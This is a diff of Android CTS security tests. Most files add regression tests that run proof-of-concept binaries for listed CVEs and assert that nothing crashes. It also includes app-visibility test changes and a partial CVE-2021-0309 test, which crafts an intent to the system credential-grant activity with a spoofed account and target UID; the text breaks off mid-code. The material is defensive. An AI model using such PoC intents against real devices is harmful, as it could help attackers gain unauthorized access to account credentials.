 import android.platform.test.annotations.SecurityTest;
 import org.junit.Test;
 import org.junit.runner.RunWith;
 import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
 
-import static org.junit.Assume.assumeTrue;
-import static org.junit.Assume.assumeThat;
-import static org.hamcrest.CoreMatchers.equalTo;
-import static org.junit.Assert.*;
-
 @RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0461 extends SecurityTestCase {
+public class CVE_2019_2135 extends SecurityTestCase {
 
     /**
-     * b/162741784
+     * b/125900276
+     * Vulnerability Behaviour: SIGSEGV in self
      */
+    @SecurityTest(minPatchLevel = "2019-08")
     @Test
-    @SecurityTest(minPatchLevel = "2020-12")
-    public void testPocCVE_2020_0461() throws Exception {
-        assumeTrue(containsDriver(getDevice(),
-                "/sys/devices/system/cpu/vulnerabilities/meltdown"));
-        String meltdown = AdbUtils.runCommandLine(
-                "cat /sys/devices/system/cpu/vulnerabilities/meltdown", getDevice());
-        assertFalse(meltdown.startsWith("Vulnerable"));
-        assertTrue(meltdown.startsWith("Not affected") ||
-                meltdown.startsWith("Mitigation"));
+    public void testPocCVE_2019_2135() throws Exception {
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice());
     }
 }
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
new file mode 100644
index 00000000000..4e0a4a6e754
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0037 extends SecurityTestCase {
+
+    /**
+     * b/143106535
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @SecurityTest(minPatchLevel = "2020-03")
+    @Test
+    public void testPocCVE_2020_0037() throws Exception {
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
new file mode 100644
index 00000000000..6759c30caf3
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0038 extends SecurityTestCase {
+
+    /**
+     * b/143109193
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @SecurityTest(minPatchLevel = "2020-03")
+    @Test
+    public void testPocCVE_2020_0038() throws Exception {
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
new file mode 100644
index 00000000000..f0f3323f20c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0039 extends SecurityTestCase {
+
+    /**
+     * b/143155861
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @SecurityTest(minPatchLevel = "2020-03")
+    @Test
+    public void testPocCVE_2020_0039() throws Exception {
+        pocPusher.only64();
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
new file mode 100644
index 00000000000..2d5237a7186
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0381 extends SecurityTestCase {
+
+    /**
+     * b/150159669
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @SecurityTest(minPatchLevel = "2020-09")
+    @Test
+    public void testPocCVE_2020_0381() throws Exception {
+        assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+        String inputFiles[] = {"cve_2020_0381.xmf", "cve_2020_0381.info"};
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0381",
+                AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+                inputFiles, AdbUtils.TMP_PATH, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
new file mode 100644
index 00000000000..2f7b5d90eb7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0384 extends SecurityTestCase {
+
+    /**
+     * b/150159906
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @SecurityTest(minPatchLevel = "2020-09")
+    @Test
+    public void testPocCVE_2020_0384() throws Exception {
+        assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+        String inputFiles[] = {"cve_2020_0384.xmf", "cve_2020_0384.info"};
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0384",
+                AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+                inputFiles, AdbUtils.TMP_PATH, getDevice());
+    }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
new file mode 100644
index 00000000000..e7aefeb9638
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0385 extends SecurityTestCase {
+
+    /**
+     * b/150160041
+     * Vulnerability Behaviour: SIGSEGV in self
+     */
+    @SecurityTest(minPatchLevel = "2020-09")
+    @Test
+    public void testPocCVE_2020_0385() throws Exception {
+        assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+        String inputFiles[] = {"cve_2020_0385.xmf", "cve_2020_0385.info"};
+        AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0385",
+                AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+                inputFiles, AdbUtils.TMP_PATH, getDevice());
+    }
+}
diff --git a/libs/install/Android.bp b/libs/install/Android.bp
index 6babab7fcbe..8d0f799d110 100644
--- a/libs/install/Android.bp
+++ b/libs/install/Android.bp
@@ -91,7 +91,7 @@ android_test_helper_app {
 }
 
 java_library {
-    name: "cts-install-lib",
+    name: "cts-install-lib-java",
     srcs: ["src/**/lib/*.java"],
     static_libs: ["androidx.test.rules", "compatibility-device-util-axt", "truth-prebuilt"],
     sdk_version: "test_current",
@@ -111,6 +111,14 @@ java_library {
     ],
 }
 
+android_library {
+    name: "cts-install-lib",
+    manifest: "AndroidManifest.xml",
+    static_libs: [
+        "cts-install-lib-java",
+    ],
+}
+
 java_library_host {
     name: "cts-install-lib-host",
     srcs: ["src/**/host/InstallUtilsHost.java"],
diff --git a/libs/install/AndroidManifest.xml b/libs/install/AndroidManifest.xml
new file mode 100644
index 00000000000..e9f5b7d1278
--- /dev/null
+++ b/libs/install/AndroidManifest.xml
@@ -0,0 +1,29 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2020 The Android Open Source Project
+
+     Licensed under the Apache License, Version 2.0 (the "License");
+     you may not use this file except in compliance with the License.
+     You may obtain a copy of the License at
+
+          http://www.apache.org/licenses/LICENSE-2.0
+
+     Unless required by applicable law or agreed to in writing, software
+     distributed under the License is distributed on an "AS IS" BASIS,
+     WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+     See the License for the specific language governing permissions and
+     limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+          package="com.android.cts.install.lib"
+          android:versionCode="1"
+          android:versionName="1.0">
+
+    <queries>
+        <package android:name="com.android.cts.install.lib.testapp.A"/>
+        <package android:name="com.android.cts.install.lib.testapp.B"/>
+        <package android:name="com.android.cts.install.lib.testapp.C"/>
+    </queries>
+
+    <uses-sdk android:minSdkVersion="8"/>
+</manifest>
diff --git a/libs/install/testapp/ACrashingV2.xml b/libs/install/testapp/ACrashingV2.xml
index 0ec90cfe66c..338a5b95647 100644
--- a/libs/install/testapp/ACrashingV2.xml
+++ b/libs/install/testapp/ACrashingV2.xml
@@ -22,7 +22,7 @@
 
     <uses-sdk android:minSdkVersion="19" />
 
-    <application android:label="Test App A v2" android:forceQueryable="true">
+    <application android:label="Test App A v2">
         <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData"
                   android:exported="true" />
         <activity android:name="com.android.cts.install.lib.testapp.CrashingMainActivity">
diff --git a/libs/install/testapp/Av1.xml b/libs/install/testapp/Av1.xml
index 5b476994cea..e9714fc4ca6 100644
--- a/libs/install/testapp/Av1.xml
+++ b/libs/install/testapp/Av1.xml
@@ -22,7 +22,7 @@
 
     <uses-sdk android:minSdkVersion="19" />
 
-    <application android:label="Test App A1" android:forceQueryable="true">
+    <application android:label="Test App A1">
         <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData"
                   android:exported="true" />
         <activity android:name="com.android.cts.install.lib.testapp.MainActivity">
diff --git a/libs/install/testapp/Av2.xml b/libs/install/testapp/Av2.xml
index 9f2c21a0e82..fd8afa0e7e7 100644
--- a/libs/install/testapp/Av2.xml
+++ b/libs/install/testapp/Av2.xml
@@ -22,7 +22,7 @@
 
     <uses-sdk android:minSdkVersion="19" />
 
-    <application android:label="Test App A2" android:forceQueryable="true">
+    <application android:label="Test App A2">
         <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData"
             android:exported="true" />
         <activity android:name="com.android.cts.install.lib.testapp.MainActivity">
diff --git a/libs/install/testapp/Av3.xml b/libs/install/testapp/Av3.xml
index d86aebdd2c9..a7839e31765 100644
--- a/libs/install/testapp/Av3.xml
+++ b/libs/install/testapp/Av3.xml
@@ -22,7 +22,7 @@
 
     <uses-sdk android:minSdkVersion="19" />
 
-    <application android:label="Test App A3" android:forceQueryable="true">
+    <application android:label="Test App A3">
         <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData"
             android:exported="true" />
         <activity android:name="com.android.cts.install.lib.testapp.MainActivity">
diff --git a/libs/install/testapp/Bv1.xml b/libs/install/testapp/Bv1.xml
index f990713975f..403e7e20fe8 100644
--- a/libs/install/testapp/Bv1.xml
+++ b/libs/install/testapp/Bv1.xml
@@ -22,7 +22,7 @@
 
     <uses-sdk android:minSdkVersion="19" />
 
-    <application android:label="Test App B1" android:forceQueryable="true">
+    <application android:label="Test App B1">
         <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData"
             android:exported="true" />
         <activity android:name="com.android.cts.install.lib.testapp.MainActivity">
diff --git a/libs/install/testapp/Bv2.xml b/libs/install/testapp/Bv2.xml
index 3bd729258b7..f030c3f3186 100644
--- a/libs/install/testapp/Bv2.xml
+++ b/libs/install/testapp/Bv2.xml
@@ -22,7 +22,7 @@
 
     <uses-sdk android:minSdkVersion="19" />
 
-    <application android:label="Test App B2" android:forceQueryable="true">
+    <application android:label="Test App B2">
         <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData"
             android:exported="true" />
         <activity android:name="com.android.cts.install.lib.testapp.MainActivity">
diff --git a/libs/install/testapp/Cv1.xml b/libs/install/testapp/Cv1.xml
index 32f69896faa..edb69f92494 100644
--- a/libs/install/testapp/Cv1.xml
+++ b/libs/install/testapp/Cv1.xml
@@ -23,7 +23,7 @@
 
     <uses-sdk android:minSdkVersion="19" />
 
-    <application android:label="Test App C1" android:forceQueryable="true">
+    <application android:label="Test App C1">
         <receiver android:name="com.android.cts.install.lib.testapp.ProcessUserData"
             android:exported="true" />
         <activity android:name="com.android.cts.install.lib.testapp.MainActivity">
diff --git a/tests/tests/appenumeration/AndroidTest.xml b/tests/tests/appenumeration/AndroidTest.xml
index 6503bdbeba9..26f6b90b9ca 100644
--- a/tests/tests/appenumeration/AndroidTest.xml
+++ b/tests/tests/appenumeration/AndroidTest.xml
@@ -26,7 +26,7 @@
         <option name="force-queryable" value="false" />
         <option name="cleanup-apks" value="true" />
         <option name="test-file-name" value="CtsAppEnumerationTestCases.apk" />
-        <option name="test-file-name" value="CtsAppEnumerationForceQueryable.apk" />
+        <option name="test-file-name" value="CtsAppEnumerationForceQueryableNormalInstall.apk" />
         <option name="test-file-name" value="CtsAppEnumerationFilters.apk" />
         <option name="test-file-name" value="CtsAppEnumerationNoApi.apk" />
         <option name="test-file-name" value="CtsAppEnumerationContactsActivityTarget.apk" />
@@ -61,6 +61,12 @@
         <option name="test-file-name" value="CtsAppEnumerationWildcardBrowserActivitySource.apk" />
     </target_preparer>
 
+    <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
+        <option name="force-queryable" value="true" />
+        <option name="cleanup-apks" value="true" />
+        <option name="test-file-name" value="CtsAppEnumerationForceQueryable.apk" />
+    </target_preparer>
+
     <!-- Create place to store apks -->
     <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
         <option name="run-command" value="mkdir -p /data/local/tmp/cts/appenumeration" />
diff --git a/tests/tests/appenumeration/app/target/Android.bp b/tests/tests/appenumeration/app/target/Android.bp
index 04ebc788f5e..b3afe4b98cc 100644
--- a/tests/tests/appenumeration/app/target/Android.bp
+++ b/tests/tests/appenumeration/app/target/Android.bp
@@ -27,6 +27,20 @@ android_test_helper_app {
 }
 
 android_test_helper_app {
+    name: "CtsAppEnumerationForceQueryableNormalInstall",
+    manifest: "AndroidManifest-forceQueryable-normalInstall.xml",
+    defaults: ["cts_support_defaults"],
+    srcs: ["src/**/*.java"],
+    // Tag this module as a cts test artifact
+    test_suites: [
+        "cts",
+        "vts10",
+        "general-tests",
+    ],
+    sdk_version: "test_current",
+}
+
+android_test_helper_app {
     name: "CtsAppEnumerationFilters",
     manifest: "AndroidManifest-filters.xml",
     defaults: ["cts_support_defaults"],
diff --git a/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable-normalInstall.xml b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable-normalInstall.xml
new file mode 100644
index 00000000000..2918e37d44a
--- /dev/null
+++ b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable-normalInstall.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+    Copyright (C) 2019 The Android Open Source Project
+
+    Licensed under the Apache License, Version 2.0 (the "License");
+    you may not use this file except in compliance with the License.
+    You may obtain a copy of the License at
+
+         http://www.apache.org/licenses/LICENSE-2.0
+
+    Unless required by applicable law or agreed to in writing, software
+    distributed under the License is distributed on an "AS IS" BASIS,
+    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    See the License for the specific language governing permissions and
+    limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.appenumeration.forcequeryable.normalinstall">
+    <application android:forceQueryable="true">
+        <!-- This app will not be a system app and should be installed as a normal app (not
+             forceQueryable) to ensure it's not visible by default -->
+        <uses-library android:name="android.test.runner" />
+    </application>
+</manifest>
diff --git a/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml
index e6535b3c3ae..041d350519f 100644
--- a/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml
+++ b/tests/tests/appenumeration/app/target/AndroidManifest-forceQueryable.xml
@@ -18,6 +18,8 @@
 <manifest xmlns:android="http://schemas.android.com/apk/res/android"
     package="android.appenumeration.forcequeryable">
     <application android:forceQueryable="true">
+        <!-- This app will not be a system app and so must be installed as forceQueryable by the
+             test framework -->
         <uses-library android:name="android.test.runner" />
     </application>
 </manifest>
diff --git a/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java b/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java
index 6fcba549e31..d7c8dae2fb7 100644
--- a/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java
+++ b/tests/tests/appenumeration/lib/src/android/appenumeration/cts/Constants.java
@@ -78,8 +78,13 @@ public class Constants {
     public static final String TARGET_SHARED_USER = PKG_BASE + "noapi.shareduid";
     /** A package that exposes itself via various intent filters (activities, services, etc.) */
     public static final String TARGET_FILTERS = PKG_BASE + "filters";
-    /** A package that declares itself force queryable, making it visible to all other packages */
+    /** A package that declares itself force queryable, making it visible to all other packages.
+     *  This is installed as forceQueryable as non-system apps cannot declare themselves as such. */
     public static final String TARGET_FORCEQUERYABLE = PKG_BASE + "forcequeryable";
+    /** A package that declares itself force queryable, but is installed normally making it not
+     *  visible to other packages */
+    public static final String TARGET_FORCEQUERYABLE_NORMAL =
+            PKG_BASE + "forcequeryable.normalinstall";
     /** A package with no published API and so isn't queryable by anything but package name */
     public static final String TARGET_NO_API = PKG_BASE + "noapi";
     /** A package that offers an activity used for opening / editing file types */
diff --git a/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java b/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java
index d95970b864d..cfd12a2f672 100644
--- a/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java
+++ b/tests/tests/appenumeration/src/android/appenumeration/cts/AppEnumerationTests.java
@@ -66,6 +66,7 @@ import static android.appenumeration.cts.Constants.TARGET_EDITOR;
 import static android.appenumeration.cts.Constants.TARGET_FILTERS;
 import static android.appenumeration.cts.Constants.TARGET_FILTERS_APK;
 import static android.appenumeration.cts.Constants.TARGET_FORCEQUERYABLE;
+import static android.appenumeration.cts.Constants.TARGET_FORCEQUERYABLE_NORMAL;
 import static android.appenumeration.cts.Constants.TARGET_NO_API;
 import static android.appenumeration.cts.Constants.TARGET_SHARE;
 import static android.appenumeration.cts.Constants.TARGET_SHARED_USER;
@@ -177,6 +178,15 @@ public class AppEnumerationTests {
     }
 
     @Test
+    public void all_cannotSeeForceQueryableInstalledNormally() throws Exception {
+        assertNotVisible(QUERIES_NOTHING, TARGET_FORCEQUERYABLE_NORMAL);
+        assertNotVisible(QUERIES_ACTIVITY_ACTION, TARGET_FORCEQUERYABLE_NORMAL);
+        assertNotVisible(QUERIES_SERVICE_ACTION, TARGET_FORCEQUERYABLE_NORMAL);
+        assertNotVisible(QUERIES_PROVIDER_AUTH, TARGET_FORCEQUERYABLE_NORMAL);
+        assertNotVisible(QUERIES_PACKAGE, TARGET_FORCEQUERYABLE_NORMAL);
+    }
+
+    @Test
     public void startExplicitly_canStartNonVisible() throws Exception {
         assertNotVisible(QUERIES_NOTHING, TARGET_FILTERS);
         startExplicitIntentViaComponent(QUERIES_NOTHING, TARGET_FILTERS);
diff --git a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
index 5584fabf91f..16d595fb584 100644
--- a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
+++ b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
@@ -27,6 +27,7 @@ import android.content.res.Configuration;
 import android.database.Cursor;
 import android.net.Uri;
 import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
 import android.provider.Settings;
 import android.provider.Settings.SettingNotFoundException;
 import android.provider.Settings.System;
@@ -139,6 +140,10 @@ public class Settings_SystemTest {
         }
     }
 
+    /**
+     * Verifies that the invalid values for the font scale setting are rejected.
+     */
+    @SecurityTest(minPatchLevel = "2021-02")
     @Test
     public void testSystemSettingsRejectInvalidFontSizeScale() throws SettingNotFoundException {
         final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp
index 41d9fad8879..e82f2e1a677 100644
--- a/tests/tests/security/Android.bp
+++ b/tests/tests/security/Android.bp
@@ -27,6 +27,7 @@ android_test {
         "compatibility-common-util-devicesidelib",
         "guava",
         "platform-test-annotations",
+        "hamcrest-library",
     ],
     libs: [
         "android.test.runner.stubs",
@@ -75,4 +76,4 @@ android_test_helper_app {
 android_app_certificate {
     name: "security_cts_test_certificate",
     certificate: "security_cts_test_cert",
-}
\ No newline at end of file
+}
diff --git a/tests/tests/security/res/anim/translate1.xml b/tests/tests/security/res/anim/translate1.xml
index e8c562e1399..da2ee564649 100644
--- a/tests/tests/security/res/anim/translate1.xml
+++ b/tests/tests/security/res/anim/translate1.xml
@@ -4,4 +4,4 @@
     android:fromYDelta="0%"
     android:toYDelta="-100%"
     android:interpolator="@android:anim/linear_interpolator"
-    android:duration="6000" />
+    android:duration="10000" />
diff --git a/tests/tests/security/res/anim/translate2.xml b/tests/tests/security/res/anim/translate2.xml
index 7156c5689d5..d4bc6d90fbe 100644
--- a/tests/tests/security/res/anim/translate2.xml
+++ b/tests/tests/security/res/anim/translate2.xml
@@ -4,4 +4,4 @@
     android:fromYDelta="100%"
     android:toYDelta="0%"
     android:interpolator="@android:anim/linear_interpolator"
-    android:duration="6000" />
+    android:duration="10000" />
diff --git a/tests/tests/security/res/raw/cve_2020_11122.mkv b/tests/tests/security/res/raw/cve_2020_11122.mkv
new file mode 100644
index 00000000000..f0fa08f22af
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11122.mkv
diff --git a/tests/tests/security/res/raw/cve_2020_11139.flac b/tests/tests/security/res/raw/cve_2020_11139.flac
new file mode 100644
index 00000000000..3700ba9ab23
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11139.flac
diff --git a/tests/tests/security/res/raw/cve_2020_11168.mkv b/tests/tests/security/res/raw/cve_2020_11168.mkv
new file mode 100644
index 00000000000..58bf85e42d2
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_11168.mkv
diff --git a/tests/tests/security/res/raw/cve_2020_3663.mp4 b/tests/tests/security/res/raw/cve_2020_3663.mp4
new file mode 100644
index 00000000000..54af26cad62
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3663.mp4
diff --git a/tests/tests/security/res/raw/cve_2020_3688.mp4 b/tests/tests/security/res/raw/cve_2020_3688.mp4
new file mode 100644
index 00000000000..18ec0ad8be4
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2020_3688.mp4
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0309.java b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java
new file mode 100644
index 00000000000..3f39a0ef85f
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0309.java
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import static org.junit.Assert.assertFalse;
+
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.accounts.AccountManager;
+import android.accounts.GrantCredentialsPermissionActivity;
+import android.accounts.IAccountAuthenticatorResponse;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.RemoteException;
+import android.platform.test.annotations.SecurityTest;
+
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class CVE_2021_0309 {
+    private final Context mContext = InstrumentationRegistry.getContext();
+    boolean isVulnerable = true;
+
+    /**
+     * b/159145361
+     */
+    @SecurityTest(minPatchLevel = "2021-01")
+    @Test
+    public void testPocCVE_2021_0309() {
+        /**
+         * Output of adb shell pm list packages --user 0 -U com.android.providers.media
+         * package:com.android.providers.media uid:10008
+         */
+        final int REQUESTED_UID = 10008;
+        Intent intent = new Intent();
+        intent.setClassName("android",
+                            "android.accounts.GrantCredentialsPermissionActivity");
+        intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+        intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_ACCOUNT,
+                        new Account("abc@xyz.org", "com.my.auth"));
+        intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_AUTH_TOKEN_TYPE,
+                        AccountManager.ACCOUNT_ACCESS_TOKEN_TYPE);
+        intent.putExtra(GrantCredentialsPermissionActivity.EXTRAS_RESPONSE,
+            new AccountAuthenticatorResponse(new IAccountAuthenticatorResponse.Stub() {
+                @Override
+                public void onResult(Bundle value) throws RemoteException {
+                }
+
+                @Override
+                public void onRequestContinued() {
+                }
+
+                @Override
